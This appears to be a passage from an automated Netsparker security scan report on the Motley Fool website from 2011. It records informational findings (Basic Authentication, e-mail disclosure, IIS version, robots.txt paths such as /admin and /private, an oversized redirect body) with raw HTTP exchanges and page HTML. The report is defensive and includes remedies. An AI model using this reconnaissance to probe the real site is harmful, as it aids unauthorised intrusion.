Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/,Tookie=T=62122750254005380745485366172445; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:26:48 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

Basic Authorization Required

1 TOTAL

INFORMATION

CONFIRMED

Netsparker identified a resource that requires Basic Authentication. Generally, using Basic Authentication is not a good solution. See remedy and impact for remedy further details.

Impact

There are some potential issues :

It may cause transmitting your credentials over HTTP on a clear-text form.
If this is an admin screen, it should not be publicly accessible.
If this is an unrequired login screen, it should be removed.

Remedy

See Impact section. Disable it or Apply firewall rules.

- /common/pages/waf/wafblocked.aspx

/common/pages/waf/wafblocked.aspx CONFIRMED

http://www.fool.com/common/pages/waf/wafblocked.aspx?session_id=7306905596152723244&event_id=6399353..

Parameters

Parameter	Type	Value
session_id	GET	7306905596152723244
event_id	GET	6399353741546585416

Request

GET /common/pages/waf/wafblocked.aspx?session_id=7306905596152723244&event_id=6399353741546585416 HTTP/1.1
Referer: http://www.fool.com/m.aspx?i=12005470
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2F; Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3a%2f%2fwww.fool.com%2f; Tookie=T=40840446508664684874763134414036; v1st=32166C75ABD13BB9; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 401 Unauthorized
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close

<html><head><title>The Motley Fool</title></head><body><a href="http://www.fool.com"><img src="http://g.fool.com/img/logo_fool_screen.gif" border=0 alt="The Motley Fool"></a><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td bgcolor=#336699 height=20></td></tr><tr><td><blockquote><br><h2><font color=red>Bad Request Detected!</font></h2><b>You've made an awful lot of requests on our servers in a very short time. No offense, but we're not certain you are human.</b><p>If you really are human, and have been flagged in error, please wait 5 minutes and hit the back button to try your request again. If you continue to get this message, please contact customer service and reference incident ID: 7306905596152723244.</b></blockquote></td></tr><tr><td bgcolor=#336699 height=20></td></tr></table></body></html>

E-mail Address Disclosure

1 TOTAL

INFORMATION

Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Wikipedia - E-Mail Spam

- /press/about.htm

/press/about.htm

http://www.fool.com/press/about.htm

Found E-mails

pr@fool.com

Request

GET /press/about.htm HTTP/1.1
Referer: http://www.fool.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=1; Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3a%2f%2fnone%2f; Tookie=T=62122750254005380745485366172445; v1st=E48340A3C6A8D1C; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND",policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=1; domain=.fool.com; path=/,Tookie=T=62122750254005380745485366172445; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:26:53 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>About The Motley Fool [Fool.com: Press]</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />

<meta name="description" content="The Motley Fool offers seven monthly investment newsletters to their members, covering a variety of investing styles - Motley Fool Hidden Gems, Motley Fool Rule Breakers, Motley Fool Rule Your Retirement, Motley Fool Inside Value, Motley Fool Champion Funds, Motley Fool Income Investor, and Motley Fool Stock Advisor." />
<meta name="keywords" content="About Motley Fool History Newsletters" />
<meta name="tickers" content="" />
<meta name="date" content="2005-01-25T11:00-04:00" />
<meta name="author" content="" />

<meta name="expiration" content="Date + 12 months" />
<meta name="articletype" content="Press" />


<link rel="stylesheet" type="text/css" href="http://g.foolcdn.com/includes/css/20071107/Screen.css" title="usmf" />


<script src="http://g.fool.com/common/js/prototype_fool.min.js" type="text/javascript"></script>

<script src="http://g.fool.com/common/js/fx_usmf.min.js" type="text/javascript"></script>
<script src="http://g.fool.com/js/WWW.min.js" type="text/javascript"></script>

<link rel="stylesheet" media="screen" href="http://g.fool.com/common/css/Fool.css" />
<link rel="stylesheet" media="screen" href="http://g.fool.com/common/css/Usmf.css" />
<link rel="stylesheet" media="screen" href="http://g.fool.com/css/WWW.css" />
<link rel="stylesheet" media="screen" href="http://g.fool.com/css/Compat.css" />


<style type="text/css">
/*-------------------------------------------------
=Over-ride Usmf.css globals that break IE6 on doctyped pages
-------------------------------------------------*/
* html div#ed-art-head,
* html div#ed-art-content,
* html div#ed-art-bottom {
width:auto;
}
div#ed-art-content:after { /* = FF etc */
content: ".";
display:block;height:0;
clear:both;
visibility:hidden;
}
</style>
</head>
<body class="ed-body">
<div id="ed-align">
<div class="ed-container">
<div id="ed-topnav">

<div id="header" class="navCellA"><div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">The World's Greatest Investing Community</span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="http://www.fool.com/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="http://www.fool.com/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="http://www.fool.com/landing/tmf/registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="http://www.fool.com/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/fool_labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001 on"><a href="http://www.fool.com/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/favoriteboards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/myplayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/account/index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/myplayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/tickerrankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/playerrankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/tagrankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/feedback.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/retirement/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Retirement</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/retirement/general/how-to-retire-in-style.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Retirement Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href=&..

IIS Version Disclosure

1 TOTAL

INFORMATION

Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /robots.txt

/robots.txt

http://www.fool.com/robots.txt

Extracted Version

Microsoft-IIS/7.0

Request

Response

Robots.txt Identified

1 TOTAL

INFORMATION

CONFIRMED

Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

If disallowed paths are sensitive, do not write them in the robots.txt and ensure that they correctly protected by means of authentication.

- /robots.txt

/robots.txt CONFIRMED

http://www.fool.com/robots.txt

Interesting Robots.txt Entries

Disallow: /
Disallow: /Includes
Disallow: /includes
Disallow: /Scripts
Disallow: /scripts
Disallow: /Admin
Disallow: /admin
Disallow: /Articles
Disallow: /articles
Disallow: /Partners
Disallow: /partners
Disallow: /Private
Disallow: /private
Disallow: /Server
Disallow: /server
Disallow: /Test
Disallow: /test
Disallow: /MailEmergency
Disallow: /mailEmergency
Disallow: /mailemergency
Disallow: /Localize
Disallow: /localize
Disallow: /Snap
Disallow: /snap
Disallow: /FoolPics
Disallow: /foolPics
Disallow: /foolpics
Disallow: /Pegulator
Disallow: /pegulator
Disallow: /Shop/Download/Event/
Disallow: /help
Disallow: /Help
Disallow: /Search
Disallow: /search
Disallow: /Feeds
Disallow: /feeds
Disallow: /News/Xt
Disallow: /News/XT
Disallow: /news/xt
Disallow: /investing/fiercemarkets/
Disallow: /investing/FierceMarkets/

Request

Response

Redirect Response BODY Is Too Large

1 TOTAL

INFORMATION

CONFIRMED

Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.

- /help/index.htm

/help/index.htm CONFIRMED

http://www.fool.com/help/index.htm?display=about02&ref=BTMP

Request

GET /help/index.htm?display=about02&ref=BTMP HTTP/1.1
Referer: http://www.fool.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=1; Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3a%2f%2fnone%2f; Tookie=T=62122750254005380745485366172445; v1st=E48340A3C6A8D1C; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Type: text/html
Location: http://www.fool.com/legal/fool-disclosure-policy.aspx
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND",policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=1; domain=.fool.com; path=/,Tookie=T=62122750254005380745485366172445; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:27:43 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="description" content="Help - Motley Fool Help Topics"/>
<meta name="expiration" content="Date + 12 months"/>
<meta name="articletype" content="Help"/>

<style type="text/css">
fieldset {
border:none !important;
padding-left:0px !important;
}
fieldset legend {
padding-top:10px !important;
padding-left:0 !important;
margin-left:0 !important;
color:#333 !important;
font: 18px normal arial,sans-serif !important;
}
fieldset dl {
margin: 0;
padding:0;
}
fieldset dt {
color: #666666;
font-size: .9em;
margin:0;
padding:0;
}
fieldset dd {
font-size: .9em;
margin: 0;
padding:0;
}
fieldset input,
fieldset select {
border: 1px Solid #cbccd1;
padding: 2px;
width: 280px;
background:url(http://g.foolcdn.com/art/newsletters/images/bg_input.gif) repeat-x;
font:14px arial,sans-serif;
margin:0 0 10px 0 !important;
}
fieldset textarea {
border: 1px Solid #cbccd1;
padding: 2px;
width: 450px;
background:url(http://g.foolcdn.com/art/newsletters/images/bg_input.gif) repeat-x !important;
}
fieldset label {
font:13px normal arial,sans-serif !important;
color:#444 !important;
padding:0 !important;
margin:0 !important;
}
.error {
font-weight:bold;
color:#c30;
}
.csButton {
background: url(http://g.foolcdn.com/art/newsletters/images/bg_button.gif) repeat-x bottom left;"
}
.csButtonOver {
background: #c30;
color:#fff;
}
span.required {
color:#c30 !important;
}
</style>
<title>Help | Fool Disclosure Policy</title>

<link rel="stylesheet" type="text/css" href="http://g.foolcdn.com/includes/css/20071107/Screen.css" title="usmf" />


<script src="http://g.fool.com/common/js/prototype_fool.min.js" type="text/javascript"></script>

<script src="http://g.fool.com/common/js/fx_usmf.min.js" type="text/javascript"></script>
<script src="http://g.fool.com/js/WWW.min.js" type="text/javascript"></script>

<link rel="stylesheet" media="screen" href="http://g.fool.com/common/css/Fool.css" />
<link rel="stylesheet" media="screen" href="http://g.fool.com/common/css/Usmf.css" />
<link rel="stylesheet" media="screen" href="http://g.fool.com/css/WWW.css" />
<link rel="stylesheet" media="screen" href="http://g.fool.com/css/Compat.css" />



<style type="text/css" media="all">
@import "/includes/css/centers/centertabs.css?date=061216";
</style>
<style type="text/css" media="screen">@import "/Includes/Css/Help.css?date=20071203";</style>
</head>
<body class="ed-body">
<div id="ed-align">
<div class="ed-container">
<div id="ed-topnav">

<div id="header" class="navCellA"><div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">The Official Website of the Long-Term Investor</span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="http://www.fool.com/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="http://www.fool.com/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="http://www.fool.com/landing/tmf/registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="http://www.fool.com/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/fool_labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/favoriteboards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/myplayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/account/index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
